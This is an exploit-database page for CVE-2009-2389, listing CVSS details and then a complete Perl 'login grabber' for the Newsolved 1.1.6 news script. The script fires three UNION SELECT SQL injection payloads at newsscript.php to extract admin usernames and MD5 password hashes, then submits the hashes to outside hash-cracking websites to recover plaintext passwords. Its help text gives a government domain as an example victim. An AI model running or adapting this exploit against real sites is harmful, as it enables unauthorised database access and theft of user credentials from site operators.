Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit

2009.07.11
Credit: lama
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-2389
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w # Neversolved.pl # # Copyright (c) 2009 by <jmp-esp.net> # # A simple login grabber # by lama - 06/23/2009 # # Tested on: Newsolved 1.1.6 use strict; use LWP::UserAgent; use Getopt::Std; use vars qw/ %opt /; getopts( "i:p:u:lfh", \%opt ); my @bugs = ( [ "newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE" ."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok", "monat_num=1:(.*?):([a-f0-9]{32})" ], [ "newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw" ."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]", "([^>]+):([a-f0-9]{32})<" ], [ "newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3," ."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]", "<i>(.*?):([a-f0-9]{32})<\/i>" ] ); my @lookups = ( [ 'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search', '', '<div id="result" >(.*?)</div>' ], [ 'hash=[HASH]&Submit=Submit', '>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>' ], [ 'http://securitystats.com/tools/hashcrack.php', 'inputhash=[HASH]&type=MD5&Submit=Submit', '<BR>[a-f0-9]{32} = (.*?)</td>' ], [ 'http://md5decrypter.com/index.php', 'hash=[HASH]&submit=Decrypt', '<b class=\'red\'>Normal Text: </b>(.*?)\n' ] ); sub isHost { my $target = shift; if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) { my $host = $1; my $folder = ( $2 ? $2 : '/' ); if ( $folder !~ /\/$/ ) { $folder .= '/'; } return "http://$host$folder"; } else { return 0; } } sub replacePlaceholder { my $search = shift; my $replace = shift; my $placeholder = shift; $search=~s/\[$placeholder\]/$replace/g; return $search; } sub isVulnerable { my $target = shift; my $ua = LWP::UserAgent->new; my $request = new HTTP::Request('GET', $target); $request->header('User-Agent' => $opt{u}); my $response = $ua->request($request); my $body = $response->content; if ($body =~ /mysql_fetch_object/) { return 1; } elsif (!($body =~ /styles_output\.css/)) { return 0; } else { return -1; } } sub getHash { my $target = shift; my $regexp = shift; my $ua = LWP::UserAgent->new; my $request = new HTTP::Request('GET', $target); $request->header('User-Agent' => $opt{u}); my $response = $ua->request($request); my $body = $response->content; if ($body =~ /$regexp/) { return ($1, $2); } else { return 0; } } sub searchPlaintext { my $hash = shift; foreach (@lookups) { my $server = replacePlaceholder(@$_[0], $hash, "HASH"); my $post = replacePlaceholder(@$_[1], $hash, "HASH"); my $ua = LWP::UserAgent->new; my $request = new HTTP::Request('POST', $server); $request->content("$post"); $request->content_type('application/x-www-form-urlencoded'); $request->header('Referer' => $server); $request->header('User-Agent' => $opt{u}); my $response = $ua->request($request); my $body = $response->content; if ($body =~ /@$_[2]/) { return $1; } } return 0; } sub attackTarget { my $target = shift; my $userid = shift; foreach (@bugs) { my $bug = @$_[0]; $bug = replacePlaceholder($bug, $userid, "USERID"); $bug = replacePlaceholder($bug, $opt{p}, "PREFIX"); (my $username, my $password) = getHash($target.$bug, @$_[1]); if (($username) && ($password)) { return ($username, $password); } } return 0; } sub showHelp { print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n" . "Usage: $0 [options] Victim\n" . "OPTIONS\n" . " -i integer: Userid [1]\n" . " -u string: Useragent [IE]\n" . " -p string: Prefix [newsolved]\n" . " -f: Force [optional]\n" . " -l: Lookup [optional]\n" . " -h: Help [optional]\n" . "EXAMPLES\n" . " ./$0 http://pentagon.gov/news/\n" . " ./$0 -f -i 4 http://omnomnom.com/\n" . "OTHER\n" . " Magic_Quotes_GPC needs to be off\n"; } sub showBanner { print " __ \n" . " |__|.--------.-----.______.-----.-----.-----.\n" . " | || | _ |______| -__|__ --| _ |\n" . " | ||__|__|__| __| |_____|_____| __|\n" . "|___| |__| lama 06/23/2009 |__| \n" . "Kampfgeschrei!\n\n"; } if ($opt{h}) { showHelp(); exit; } my $victim = shift; if (!($victim) || !($victim = isHost($victim))) { showHelp(); exit; } $opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u}); $opt{i} = '1' if (!$opt{i}); $opt{p} = 'newsolved' if (!$opt{p}); if (scalar(@bugs) < 1) { print "Bugs or gtfo. Srsly.\n"; exit; } my $vulnerability = isVulnerable($victim.$bugs[0][0]); if ($vulnerability == 0) { print "This doesn't look like Newsolved. Read the help, now.\n\n"; showHelp(); exit if (!$opt{f}); } elsif ($vulnerability == -1) { print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n"; showHelp(); exit if (!$opt{f}); } showBanner(); (my $username, my $password) = attackTarget($victim, $opt{i}); if ($username) { print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n"; print "Username:\t$username\nPassword:\t$password\n"; if ($opt{l}) { my $cleartext = searchPlaintext($password); if ($cleartext) { print "Cleartext:\t$cleartext\n"; } else { print "Cleartext:\tNot found\n"; } } } else { print "Unable to retrieve the password: Is the userid correct?\n"; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top